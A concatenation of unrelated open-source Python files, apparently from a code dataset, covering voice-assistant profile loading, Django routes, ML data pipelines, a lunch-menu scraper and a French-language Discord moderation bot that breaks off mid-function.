from typing import Any, Dict, List
import pydash
from rhasspy.utils import recursive_update
# -----------------------------------------------------------------------------
logger = logging.getLogger(__name__)
class Profile:
"""Contains all settings for Rhasspy."""
def __init__(
self,
name: str,
system_profiles_dir: str,
user_profiles_dir: str,
layers: str = "all",
) -> None:
self.name: str = name
self.system_profiles_dir = system_profiles_dir
self.user_profiles_dir = user_profiles_dir
self.profiles_dirs: List[str] = [user_profiles_dir, system_profiles_dir]
self.layers: str = layers
self.load_profile()
# -------------------------------------------------------------------------
@classmethod
def load_defaults(cls, system_profiles_dir: str) -> Dict[str, Any]:
"""Load default profile settings."""
defaults_path = os.path.join(system_profiles_dir, "defaults.json")
with open(defaults_path, "r") as defaults_file:
logging.debug("Loading default profile settings from %s", defaults_path)
return json.load(defaults_file)
# -------------------------------------------------------------------------
def get(self, path: str, default: Any = None) -> Any:
"""Get setting by path."""
return pydash.get(self.json, path, default)
def set(self, path: str, value: Any) -> None:
"""Set setting by path."""
pydash.set_(self.json, path, value)
# -------------------------------------------------------------------------
def load_profile(self) -> None:
"""Load defaults and user settings."""
# Load defaults first
self.json: Dict[str, Any] = {} # no defaults
self.system_json: Dict[str, Any] = {} # no defaults
if self.layers in ["all", "defaults"]:
defaults_path = os.path.join(self.system_profiles_dir, "defaults.json")
with open(defaults_path, "r") as defaults_file:
self.json = json.load(defaults_file)
defaults_file.seek(0)
self.system_json = json.load(defaults_file)
# Load just the system profile.json (on top of defaults)
system_profile_path = os.path.join(
self.system_profiles_dir, self.name, "profile.json"
)
with open(system_profile_path, "r") as system_profile_file:
recursive_update(self.system_json, json.load(system_profile_file))
# Overlay with profile
self.json_path = self.read_path("profile.json")
if self.layers in ["all", "profile"]:
# Read in reverse order so user profile overrides system
for profiles_dir in self.profiles_dirs[::-1]:
json_path = os.path.join(profiles_dir, self.name, "profile.json")
if os.path.exists(json_path):
with open(json_path, "r") as profile_file:
recursive_update(self.json, json.load(profile_file))
def read_path(self, *path_parts: str) -> str:
"""Get first readable path in user then system directories."""
for profiles_dir in self.profiles_dirs:
# Try to find in the user profile first
full_path = os.path.join(profiles_dir, self.name, *path_parts)
if os.path.exists(full_path):
return full_path
# Use base dir
return os.path.join("profiles", self.name, path_parts[-1])
def read_paths(self, *path_parts: str) -> List[str]:
"""Get all readable paths in user then system directories."""
return_paths: List[str] = []
for profiles_dir in self.profiles_dirs:
# Try to find in the runtime profile first
full_path = os.path.join(profiles_dir, self.name, *path_parts)
if os.path.exists(full_path):
return_paths.append(full_path)
return return_paths
def write_path(self, *path_parts: str) -> str:
"""Get first writeable path in user then system directories."""
# Try to find in the runtime profile first
for profiles_dir in self.profiles_dirs:
full_path = os.path.join(profiles_dir, self.name, *path_parts)
try:
dir_path = os.path.split(full_path)[0]
os.makedirs(dir_path, exist_ok=True)
return full_path
except Exception:
logger.exception("Unable to write to %s", full_path)
# Use base dir
full_path = os.path.join("profiles", self.name, *path_parts)
dir_path = os.path.split(full_path)[0]
os.makedirs(dir_path, exist_ok=True)
return full_path
def write_dir(self, *dir_parts: str) -> str:
"""Get first writeable directory in user then system directories."""
# Try to find in the runtime profile first
for profiles_dir in self.profiles_dirs:
dir_path = os.path.join(profiles_dir, self.name, *dir_parts)
try:
os.makedirs(dir_path, exist_ok=True)
return dir_path
except Exception:
logger.exception("Unable to create %s", dir_path)
# Use base dir
dir_path = os.path.join("profiles", self.name, *dir_parts)
os.makedirs(dir_path, exist_ok=True)
return dir_path
| StarcoderdataPython |
3249917 | <reponame>wilmerm/unolet-2022
from django.urls import path
from person import views
urlpatterns = [
path("person/create/", views.PersonCreateView.as_view(),
name="person-person-create"),
path("person/list/", views.PersonListView.as_view(),
name="person-person-list"),
path("person/list/<int:pk>/", views.PersonDetailView.as_view(),
name="person-person-detail"),
path("person/list/<int:pk>/update/", views.PersonUpdateView.as_view(),
name="person-person-update"),
path("person/list/<int:pk>/delete/", views.PersonDeleteView.as_view(),
name="person-person-delete"),
path("identificationtype/<int:pk>/update/",
views.IdentificationTypeUpdateView.as_view(),
name="person-identificationtype-update"),
# django-autocomplete-light
path("autocomplete/person/list", views.PersonAutocompleteView.as_view(),
name="person-autocomplete-person"),
path("autocomplete/identificationtype/list/",
views.IdentificationTypeAutocompleteView.as_view(),
name="person-autocomplete-identificationtype")
] | StarcoderdataPython |
148827 | '''
pass_flatten_basic02.py
Copyright (c) Seoul National University
Licensed under the MIT license.
Author: <NAME>
Basic functionality check for torch.flatten.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
a = torch.rand(2, 3, 4, 5, 6, 7)
b = torch.flatten(a)
# shape assertion
b + torch.rand(7*6*5*4*3*2*1) | StarcoderdataPython |
3337197 | <filename>spikey/snn/readout/template.py
"""
Translator from output neuron spike trains to actions
for the environment.
"""
import numpy as np
from spikey.module import Module, Key
class Readout(Module):
"""
Translator from output neuron spike trains to actions
for the environment.
Parameters
----------
kwargs: dict
Dictionary with values for each key in NECESSARY_KEYS.
Examples
--------
.. code-block:: python
config = {
"n_outputs": 10,
"magnitude": 2,
}
readout = Readout(**config)
readout.reset()
action = readout(np.ones((10, config["n_outputs"])))
.. code-block:: python
class network_template(Network):
keys = {
"n_outputs": 10,
"magnitude": 2,
}
parts = {
"readout": Readout
}
"""
NECESSARY_KEYS = [
Key("n_outputs", "Number of output neurons, a subset of body neurons.", int),
Key("magnitude", "Spike fire magnitude.", float),
]
def __init__(self, **kwargs):
super().__init__(**kwargs)
def reset(self):
"""
Reset all readout members.
Called at the start of each episode.
"""
pass
def __call__(self, output_spike_train: np.bool) -> object:
"""
Interpret the output neuron's spike train.
Called once per game step.
Parameters
----------
output_spike_train: np.ndarray[t, n_neurons, dtype=bool]
Spike train with train[-1] being the most recent time.
Returns
-------
object Action chosen.
"""
raise NotImplementedError(f"__call__ not implemented for {type(self)}!")
| StarcoderdataPython |
3255075 | <filename>pytext/torchscript/tensorizer/bert.py
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import List, Optional, Tuple
import torch
from pytext.torchscript.utils import pad_2d_mask
from pytext.torchscript.vocab import ScriptVocabulary
from .tensorizer import ScriptTensorizer, VocabLookup
class ScriptBERTTensorizerBase(ScriptTensorizer):
def __init__(
self,
tokenizer: torch.jit.ScriptModule,
vocab: ScriptVocabulary,
max_seq_len: int,
add_bos_token: bool,
use_eos_token_for_bos: bool,
):
super().__init__()
self.tokenizer = tokenizer
self.vocab = vocab
self.vocab_lookup = VocabLookup(vocab)
self.max_seq_len = torch.jit.Attribute(max_seq_len, int)
self.add_bos_token = torch.jit.Attribute(add_bos_token, bool)
self.use_eos_token_for_bos = torch.jit.Attribute(use_eos_token_for_bos, bool)
@torch.jit.script_method
def numberize(self, row: List[str]) -> Tuple[List[int], List[int], int]:
"""Convert raw inputs into token ids by doing vocab look-up. It will also
append bos & eos index into token ids if needed.
Args:
row: 1) a list of raw inputs, in most case it is a
single text or a pair of texts.
2) a list of preprocced tokens, we could still
apply other operations (for example: bpe) on it.
Returns:
a list of token ids after doing vocab lookup and segment labels.
"""
token_ids: List[int] = []
segment_labels: List[int] = []
seq_len: int = 0
per_sentence_tokens: List[List[Tuple[str, int, int]]] = self.tokenize(row)
for idx, tokens in enumerate(per_sentence_tokens):
if idx == 0 and self.add_bos_token:
bos_idx: Optional[int] = self.vocab.bos_idx
else:
bos_idx: Optional[int] = None
lookup_ids: List[int] = self.vocab_lookup(
tokens,
bos_idx=bos_idx,
eos_idx=self.vocab.eos_idx,
use_eos_token_for_bos=self.use_eos_token_for_bos,
max_seq_len=self.max_seq_len,
)[0]
token_ids.extend(lookup_ids)
segment_labels.extend([idx] * len(lookup_ids))
seq_len = len(token_ids)
return token_ids, segment_labels, seq_len
@torch.jit.script_method
def tensorize(
self, rows: List[List[str]]
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
"""Convert multiple rows of raw inputs into model input tensors.
Args:
row: 1) each row is a list of raw inputs, in most case it is a
single text or a pair of texts.
2) each row is a list of preprocced tokens, we could still
apply other operations (for example: bpe) on it.
Returns:
model input tensors.
"""
tokens_2d: List[List[int]] = []
segment_labels_2d: List[List[int]] = []
seq_len_2d: List[int] = []
for row in rows:
numberized: Tuple[List[int], List[int], int] = self.numberize(row)
tokens_2d.append(numberized[0])
segment_labels_2d.append(numberized[1])
seq_len_2d.append(numberized[2])
tokens, pad_mask = pad_2d_mask(tokens_2d, pad_value=self.vocab.pad_idx)
segment_labels, _ = pad_2d_mask(segment_labels_2d, pad_value=self.vocab.pad_idx)
return tokens, pad_mask, segment_labels
class ScriptBERTTensorizer(ScriptBERTTensorizerBase):
@torch.jit.script_method
def tokenize(self, row: List[str]) -> List[List[Tuple[str, int, int]]]:
"""Convert raw inputs into tokens.
Args:
row: a list of raw inputs, in most case it is a
single text or a pair of texts.
Returns:
a per sentence list of tokens which include token index.
"""
per_sentence_tokens: List[List[Tuple[str, int, int]]] = []
for text in row:
per_sentence_tokens.append(self.tokenizer.tokenize(text))
return per_sentence_tokens
class ScriptBERTTokenTensorizer(ScriptBERTTensorizerBase):
@torch.jit.script_method
def tokenize(self, row: List[str]) -> List[List[Tuple[str, int, int]]]:
"""Convert raw inputs into tokens.
Args:
row: a list of preprocced tokens, we could still
apply other operations (for example: bpe) on it.
Returns:
a per sentence list of tokens which include token index.
"""
per_sentence_tokens: List[Tuple[str, int, int]] = []
for raw_token in row:
per_sentence_tokens.extend(self.tokenizer.tokenize(raw_token))
return [per_sentence_tokens]
| StarcoderdataPython |
1781768 | <gh_stars>1-10
#!/usr/bin/env python3
# Copyright (c) 2014-2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of kimenu nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Main script for choosing what restaurant parsers to use
'''
import click
import os
import sys
import requests
import requests_cache
import json
import lunch_menu.parser as ps
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
REST_FILENAME = os.path.join(__location__, 'restaurants.txt')
def read_restaurants(intext):
'''
Read the list of restaurants
Read a tsv file with the columns:
[0] campus [1] identifier [2] Name [3] URL [4] Menu URL [5] OSM URL
'''
restaurants = {}
col_names = ('campus', 'identifier', 'name', 'url', 'menu_url', 'osm')
for line in intext.split('\n'):
if not line or line[0] == '#':
continue
cols = line.rstrip().split('\t')
values = dict(zip(col_names, cols))
restaurants[values['identifier']] = values
return restaurants
REST_DATA = read_restaurants(open(REST_FILENAME).read())
# works as ordered dict as well, but must be _ordered_
MAPPER = {'jorpes': ps.parse_jorpes, 'glada': ps.parse_glada,
'haga': ps.parse_haga, 'hjulet': ps.parse_hjulet,
'jons': ps.parse_jons, 'livet': ps.parse_livet,
'nanna': ps.parse_nanna, 'svarta': ps.parse_svarta,
'bikupan': ps.parse_bikupan, 'dufva': ps.parse_dufva,
'hubben': ps.parse_hubben, 'rudbeck': ps.parse_rudbeck,
'elma': ps.parse_elma}
KI = ('jorpes', 'glada', 'haga', 'hjulet', 'jons',
'livet', 'nanna', 'svarta')
UU = ('bikupan', 'dufva', 'hubben', 'rudbeck', 'elma')
ALL = KI + UU
def build_output(data, fmt):
output = list()
if fmt == 'html':
output.append(f'''<div class="title"><a href="{data['url']}">{data['title']}</a>''')
output.append(f'''(<a href="{data['map_url']}">{data['location']}</a>)</div>''')
output.append('<div class="menu">')
output.append('<p>')
output.append('<br />\n'.join(data['menu']))
output.append('</p>')
output.append('</div>')
elif fmt == 'markdown':
# Simple markdown like format, for example slack or a terminal:
output.append(f'*{data["title"]}*')
for menu in data['menu']:
output.append('> {}'.format(menu))
else:
raise NotImplementedError(fmt)
return '\n'.join(output)
def activate_parsers(restaurants, restaurant_data, fmt='html'):
'''
Run the wanted parsers
'''
output = []
for restaurant in restaurants:
try:
data = MAPPER[restaurant](restaurant_data[restaurant])
output.append(build_output(data, fmt))
except Exception as err:
output.append(f'E in {restaurant}: {err}\n')
return output
def get_restaurant(name: str) -> dict:
'''
Request the menu of a restaurant
'''
if name in MAPPER:
return MAPPER[name](REST_DATA[name])
else:
return {}
def list_restaurants():
'''
List all supported restaurants.
'''
return list(REST_DATA.values())
def page_end():
'''
Print the closure of tags etc
'''
lines = list()
lines.append('<div class="endnote">Code available at ' +
'<a href="https://github.com/talavis/lunch-menu">' +
'Github</a>. Patches are very welcome.</div>')
lines.append('</body>')
lines.append('</html>')
return lines
def page_start(weekday, day, month):
'''
Print the initialisation of the page
'''
lines = list()
lines.append('<html>')
lines.append('<head>')
date = weekday.capitalize() + ' ' + str(day) + ' ' + str(month)
lines.append('<title>Dagens mat - {}</title>'.format(date))
lines.append('<link href="styles.css" rel="stylesheet" type="text/css">')
lines.append('<style type="text/css"></style>')
lines.append('</head>')
lines.append('<body>')
# page formatting
lines.append('')
return lines
def parse_restaurant_names(rest_names):
'''
Decide what restaurants to generate menus for
'''
restaurants = list()
for param in rest_names:
if param not in ALL:
raise ValueError('{} not a valid restaurant'.format(param))
restaurants.append(param.lower())
return restaurants
def gen_menu(restaurants, restaurant_data, fmt):
data = activate_parsers(restaurants, restaurant_data, fmt)
output = list()
if fmt == 'html':
output.extend(page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month()))
output.extend(data)
output.extend(page_end())
else:
output.extend(data)
return '\n'.join(output)
def gen_ki_menu():
'''
Generate a menu for restaurants at KI
'''
return gen_menu(KI, REST_DATA)
def gen_uu_menu():
'''
Generate a menu for restaurants at UU
'''
return gen_menu(UU, REST_DATA)
@click.command()
@click.option('--cache/--no-cache', default=False, help='Cache web request for debugging')
@click.option('--slack-channel', help='Sends the data to the specified channel')
@click.option('--slack-user', help='Slack user that posts the message', default='lunchbot')
@click.option('--slack-emoji', help='Emoji for the post', default=':croissant:')
@click.option('--fmt', default='html', type=click.Choice(('html', 'markdown')), help='The format of the output')
@click.argument('restaurants', nargs=-1, type=click.Choice(('all', 'ki', 'uu') + ALL))
def main(restaurants, cache, slack_channel, slack_user, slack_emoji, fmt):
'''Generates a report for the selected restaurant(s)'''
if cache:
# Caches all web requests in the file demo_cache. Just for testing.
requests_cache.install_cache('.devcache')
REST_NAMES_IN = tuple()
if 'all' in restaurants:
REST_NAMES_IN += ALL
elif 'ki' in restaurants:
REST_NAMES_IN += KI
elif 'uu' in restaurants:
REST_NAMES_IN += UU
else:
# NOTE: There was some undocumented -r flag here
REST_NAMES_IN = restaurants
try:
REST_NAMES = parse_restaurant_names(REST_NAMES_IN)
except ValueError as err:
sys.stderr.write('E: {}\n'.format(err))
print_usage((x for x in MAPPER))
sys.exit(1)
if slack_channel:
fmt = 'markdown'
menu = gen_menu(REST_NAMES, REST_DATA, fmt)
if slack_channel:
if slack_channel.startswith('#'):
slack_channel = '#' + slack_channel
URL = os.environ['LUNCH_MENU_SLACK_WEBHOOK']
data = {'channel': slack_channel,
'username': slack_user,
'icon_emoji': slack_emoji,
'text': menu}
data = json.dumps(data)
post_response = requests.post(URL, data=data)
print('Response[{}]: {}'.format(post_response.status_code, post_response.text))
else:
print(menu)
if __name__ == '__main__':
main()
| StarcoderdataPython |
3229879 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Efficient input pipeline using tf.data.Dataset.
Original file:
https://github.com/tensorflow/tpu/blob/master/models/official/resnet/imagenet_input.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
DUMMY_SIRNA = 10000
def set_shapes(transpose_input, batch_size, images, labels):
"""Statically set the batch_size dimension."""
if transpose_input:
images.set_shape(images.get_shape().merge_with(
tf.TensorShape([None, None, None, batch_size])))
labels.set_shape(
labels.get_shape().merge_with(tf.TensorShape([batch_size])))
else:
images.set_shape(images.get_shape().merge_with(
tf.TensorShape([batch_size, None, None, None])))
labels.set_shape(
labels.get_shape().merge_with(tf.TensorShape([batch_size])))
return images, labels
def record_to_filename(record, url_base, site=1):
exp = record[0]
plate = record[1]
return f'{url_base}/{exp}_p{plate}_s{site}.tfrecord'
def get_tfrecord_names(url_base, df, split=False, valid_pct=0.2, sites=[1,2], seed=None):
grouped = df.groupby(['experiment', 'plate'])
train_files = []
valid_files = []
for site in sites:
if split:
x = grouped.agg({'sirna': 'min'}).reset_index()
files = x.apply(lambda row: record_to_filename(row, url_base=url_base, site=site), axis=1)
labels = x['sirna']
train, valid = train_test_split(files.values, test_size=valid_pct, random_state=seed, stratify=labels)
train_files = np.concatenate([train_files, train])
valid_files = np.concatenate([valid_files, valid])
else:
train = [record_to_filename(key, url_base=url_base, site=site) for key in grouped.groups.keys()]
train_files = np.concatenate([train_files, train])
if split:
return train_files, valid_files
else:
return train_files
def parse(value, test=False):
keys_to_features = {
'image': tf.FixedLenFeature((), tf.string),
'well': tf.FixedLenFeature((), tf.string),
'well_type': tf.FixedLenFeature((), tf.string),
'plate': tf.FixedLenFeature((), tf.int64),
'site': tf.FixedLenFeature((), tf.int64),
'cell_type': tf.FixedLenFeature((), tf.string),
'experiment': tf.FixedLenFeature((), tf.string)
}
if not test:
keys_to_features['sirna'] = tf.FixedLenFeature((), tf.int64)
res = tf.parse_single_example(value, keys_to_features)
if test:
res['sirna'] = DUMMY_SIRNA
return res
def data_to_image(value, use_bfloat16=True, pixel_stats=None, dim=512):
image_raw = tf.decode_raw(value['image'], tf.uint8)
raw_shape = [512, 512, 6]
image_shape = [dim, dim, 6]
image = tf.reshape(image_raw, raw_shape)
if dim != 512:
image = tf.image.resize(image, [dim, dim])
image.set_shape(image_shape)
if pixel_stats is not None:
mean, std = pixel_stats
image = (tf.cast(image, tf.float32) - mean) / std
if use_bfloat16:
image = tf.image.convert_image_dtype(image, dtype=tf.bfloat16)
label = value["sirna"]
return image, label
DEFAULT_PARAMS = dict(batch_size=512)
def input_fn(tf_records_glob,
input_fn_params,
params=None,
use_bfloat16=False,
pixel_stats = None,
transpose_input=True,
shuffle_buffer=64,
test=False,
dim=512):
batch_size = params['batch_size']
filenames_dataset = tf.data.Dataset.list_files(tf_records_glob, shuffle=not test)
def fetch_images(filenames):
dataset = tf.data.TFRecordDataset(
filenames,
compression_type="GZIP",
buffer_size=(1000 * 1000 *
input_fn_params['tfrecord_dataset_buffer_size']),
num_parallel_reads=input_fn_params[
'tfrecord_dataset_num_parallel_reads'])
return dataset
images_dataset = filenames_dataset.apply(
tf.contrib.data.parallel_interleave(
fetch_images,
cycle_length=input_fn_params['parallel_interleave_cycle_length'],
block_length=input_fn_params['parallel_interleave_block_length'],
sloppy=not test,
buffer_output_elements=input_fn_params[
'parallel_interleave_buffer_output_elements'],
prefetch_input_elements=input_fn_params[
'parallel_interleave_prefetch_input_elements']))
if not test:
images_dataset = images_dataset.shuffle(2048).repeat()
# Get image and label now
dataset = images_dataset.apply(
tf.contrib.data.map_and_batch(
lambda value: data_to_image(parse(value, test), use_bfloat16=use_bfloat16, pixel_stats=pixel_stats, dim=dim),
batch_size=batch_size,
num_parallel_calls=input_fn_params['map_and_batch_num_parallel_calls'],
drop_remainder=True))
# Transpose for performance on TPU
if transpose_input:
dataset = dataset.map(
lambda images, labels: (tf.transpose(images, [1, 2, 3, 0]), labels),
num_parallel_calls=input_fn_params['transpose_num_parallel_calls'])
# Assign static batch size dimension
dataset = dataset.map(partial(set_shapes, transpose_input, batch_size))
# Prefetch overlaps in-feed with training
dataset = dataset.prefetch(
buffer_size=input_fn_params['prefetch_buffer_size'])
return dataset
| StarcoderdataPython |
151965 | import discord
import json
from discord.ext import commands
from discord.utils import get
sigma = commands.Bot(command_prefix='*', help_command=None)
warnings = {}
token = "TOKEN_BOT"
#Permet de mettre un statut au bot ^^
@sigma.event
async def on_ready():
print("Sigma est prêt !")
await sigma.change_presence(status=discord.Status.online,
activity=discord.Game("*help | Créer par miaoumania#1017 et ₴Ⱨ₳ĐØ₩ĐɆV#7683"))
#Cette commande nous permet de connaître des infos sur le bot ヾ(•ω•)o
@sigma.command(aliases=['bot'])
async def botinfos(ctx):
embed = discord.Embed(title="Information sur le bot !",
description="**Infos principales :**"
"Le bot Sigma est entièrement codé en Python, avec le module `discord.py` et le module `json` \n"
"Le script du bot à principalement été codé par <@490834874022756363> et le reste par <@761298593406910465>. \n"
"Le bot est host sur un serveur de 200MB de RAM et de 1GB de stockage ! \n"
"/n"
"**Infos supplémentaires :**"
"Nombre de lignes dans le script : `409` \n"
"Version de Python : `3.8` \n"
"Version du serveur host : `Pterodactyl Deamon`",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#L'une des commandes les plus importantes : les règles ╰(*°▽°*)╯
@sigma.command(aliases=['regle'])
async def regles(ctx):
embed = discord.Embed(title="Règles du serveur :",
description="Le règlement du serveur se résume aux [ToS](https://discord.com/terms) et ["
"Guidelines](https://discord.com/guidelines) de Discord. \n \n Tout membre du "
"staff se réserve le droit d'appliquer la sanction lui semblant appropriée à un "
"membre ne respectant pas l'un des points mentionnés dans les conditions et la "
"charte d'utilisation de Discord et des lois francophones.",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Eheh, je suis dedans :3, on peut voir les membres du staff de SIGMΛ
@sigma.command()
async def staff(ctx):
embed = discord.Embed(title="Les membres du staff :",
description="`@👑・Fondateurs` : <@490834874022756363> \n\n`👑・Administrateurs` : <@761298593406910465> <@630819991117234176> \n\n`⚡・Super Modérateurs` : <@699214343178551296> \n\n`🌌・Modérateurs` : <@768897650049155112> \n\n"
"/n/n"
"Total : `5` membres du staff SIGMΛ \n\n",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Je vois pas l'utilité de cette commande.. Mais elle permet de voir notre logo :O
@sigma.command(aliases=['serveuravatar'])
async def serveravatar(ctx):
embed = discord.Embed(color=0x2F3136)
embed.set_image(
url="https://cdn.discordapp.com/attachments/788793873106206758/789550458493992960/83458149cc4ab1baee5d5d3b0d25576f.png")
await ctx.send(embed=embed)
await ctx.message.delete()
#Pas besoin de vous faire un dessin, ça affiche juste l'avatar d'un mec
@sigma.command()
async def avatar(ctx, *, avamember: discord.Member = None):
userAvatarUrl = avamember.avatar_url
await ctx.send(userAvatarUrl)
#Quelques infos sur notre serveur ça fait pas de mal >:3
@sigma.command(aliases=['info'])
async def infos(ctx):
embed = discord.Embed(title="Présentation de Sιgmα",
description="SIGMΛ (aka. SIGMA, Sigma, Sιgmα, Σ) est un serveur Discord communautaire avec "
"comme but principal la discussion et le partage. Il a ouvert ses portes le 19 "
"décembre 2020, fondé par <@490834874022756363>.\n Un bot a été codé "
"spécialement pour le serveur ! \n Des animations, évenements, tournois, "
"concours... ont lieu régulièrement ! Des giveaways de jeux EpicGames sont "
"disponibles à tous les paliers de membres importants !",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Ici, miaoumania il s'est fait plaiz, 100 niveaux : ça fait beacoup là non ?
@sigma.command(aliases=['niveau'])
async def niveaux(ctx):
embed = discord.Embed(title="Les niveaux du serveur :",
description="Les niveaux du serveur vont de 0 à 100, avec un rôle pour chaque niveau. \n\nDu Niveau 1 au Niveau 100 , en passant par le Niveau 10 , le Niveau 50, ou encore le Niveau 78. \n\n Le classement des membres du serveur et la liste de tous les rôles disponibles peut être trouvée [ici](https://arcanebot.xyz/lb/sigma).",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#En gros avec ça le bot c un perroquet :D
@sigma.command()
@commands.has_permissions(manage_messages=True)
async def say(ctx, channel: discord.TextChannel, *, message):
await channel.send(message)
#Là, c'est quand ça capote D:
@say.error
async def say_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
await ctx.send("Usage de la commande impossible. Vous n'avez pas les permissions nécessaires.")
await ctx.message.delete()
#Bon, ça nous permet de connaître quelques commandes du bot, pas besoin d'avoir Bac+178 pour comprendre
@sigma.command(aliases=['aide'])
async def help(ctx):
embed = discord.Embed(title="Les différentes commandes du bot sigma :",
description="`*infos` affiche la présentation du serveur. \n`*regles` affiche les règles du serveur.\n`*salons` affiche les différents salons du serveur. \n`*staff` affiche les membres du staff de Sigma. \n `*bot` affiche les infos du bot \n`*candidature` affiche le formulaire pour soumettre sa candidature d'entrée dans le staff. \n`*suggestion` affiche les consignes pour soumettre une suggestion. \n`*reportinfos` affiche les consignes pour soumettre un report. \n`*serveravatar` affiche le logo du serveur. \n`*avatar @nomdel'utilisateur` affiche l'avatar de l'utilisateur mentionné. \n`*niveaux` affiche les différents niveaux disponibles sur le serveur.\n`*ping` affiche le ping du bot.\n`*pipo` affiche le fameux gif du pipo. \n`*serverinfo` affiche les informations du serveur.\n`*suggest [votre suggestion]` envoie la suggestion proposée.\n`*report [votre report] permez de report, de signaler un bug, etc.`\n`*help` affiche cette page. ",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Si tu sais pas comment faire une suggestion, ça peut aider
@sigma.command(aliases=['suggestions'])
async def suggestion(ctx):
embed = discord.Embed(title="Comment suggérer une modification ou un ajout ? ",
description="Pour cela, rendez-vous dans le <#788817193709469746> (en traveaux) et tapez la commande ***suggest** suivie de votre suggestion.",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#La même chose qu'au dessus mais pour les reports cette fois
@sigma.command(aliases=['reportinfo'])
async def reportinfos(ctx):
embed = discord.Embed(title="Comment report quelqu'un ou un bug ?",
description="Si vous voulez report quelqu'un, merci de nous indiquer son pseudo **sans** le mentionner ou nous donner son **ID** avec le plus de détails possibles. \n"
"/n"
"Si vous voulez report un bug, merci de nous indiquer dans quel salon cela est arrivé, et de nous donner les details du bug pour permettre à notre staff de le régler le plus vite possible.",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Si tu veux entrer dans note secte *hum hum* je veux dire staff, remplit le formulaire
@sigma.command(aliases=['candid', 'candidatures'])
async def candidature(ctx):
embed = discord.Embed(title="Comment soumettre sa candidature pour entrer dans le staff ? ",
description="Pour cela, rendez-vous sur [cette page](https://docs.google.com/forms/d/e/1FAIpQLSdiYRTJVfQ6fIZdj7IY6PjBlZRsYbN-o7tQY2o-bhOpfDwG4w/viewform?usp=pp_url), et répondez aux questions. Un administrateur vous recontactera pour vous donner les résultats.",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Noice, si tu sais quel channel sert à quoi bah viens ici lol
@sigma.command(aliases=['salon', 'channel', 'channels'])
async def salons(ctx):
embed = discord.Embed(title="Les salons du serveur :",
description="<#788782269018931202> ・ La présentation du serveur ヾ(•ω•)o \n<#788780806230900766> ・ Règlement du serveur ψ(.-. )> \n`━━━━━📜━━━━━` \n<#788784016001859585> ・ Salon qui contient les annonces du serveur ( ̄3 ̄)╭ \n <#788800922842955857> ・ Salon des arrivées, départs, warns, invitations... (*^_^*) \n<#788764210443059200> ・ Salon textuel pour bavarder (*^▽^*) \n<#788801331040616449> ・ Pour partagez des images, vidéos, gifs ou memes q(≧▽≦q)\n<#788783889828675655> ・ Salon réservé aux commandes des bots ! ╰(*°▽°*)╯\n<#788817193709469746> ・ Salon utilisé pour suggérer une modification ou un ajout ( •̀ ω •́ )✧\n`━━━━━🎉━━━━━`\n<#789055875268083783> ・ Le salon des cadeaux !!! (^∇^)\n<#788820483553755197> ・ Dans ce salon, un fait intéressant ou insolite est publié chaque jour o(* ̄▽ ̄*)o\n<#788817474350743562> ・ Chaque membre peut publier un mot ou expression afin de compléter la phrase infinie (◠‿◠)\n (***TOUTS LES SALON SONT EN TRAVEAUX !***)",
color=0x2F3136)
await ctx.send(embed=embed)
await ctx.message.delete()
#Cheh un ban ( •̀ ω •́ )✧
@sigma.command()
@commands.has_permissions(ban_members=True)
async def ban(ctx, user: discord.User, *reason):
reason = " ".join(reason)
await ctx.guild.ban(user, reason=reason)
await ctx.send(f"{user} à été ban pour la raison suivante : {reason}.")
#Bah ça à re-capoter
@ban.error
async def ban_error(ctx, error):
if isinstance(error, commands.MissingPermissions):
